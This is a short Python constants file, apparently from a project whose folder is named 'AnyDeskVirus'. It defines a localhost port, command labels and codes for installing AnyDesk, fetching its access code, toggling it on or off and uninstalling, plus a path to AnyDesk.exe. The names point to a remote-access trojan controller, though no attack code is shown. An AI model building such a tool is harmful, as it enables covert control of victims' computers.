IP = "127.0.0.1"
PORT = 44444


INSTALL_ANYDESK_COMMAND = "Install AnyDesk"
GET_CODE_COMMAND = "Get Code"
POWER_ON_ANYDESK_COMMAND = "Power On AnyDesk"
POWER_OFF_ANYDESK_COMMAND = "Power Off AnyDeks"
UNINSTALL_PROGRAM_COMMAND = "Uninstall Program"

INSTALL_ANYDESK_CODE = 0
GET_CODE_COMMAND_CODE = 1
POWER_ON_ANYDESK_CODE = 2
POWER_OFF_ANYDESK_CODE = 3
UNINSTALL_PROGRAM_CODE = 4

ANYDESK_FILE_PATH = "C:\\Users\\Matan\\Documents\\CProjects\\AnyDeskVirus\\anyDeskFile\\AnyDesk.exe"
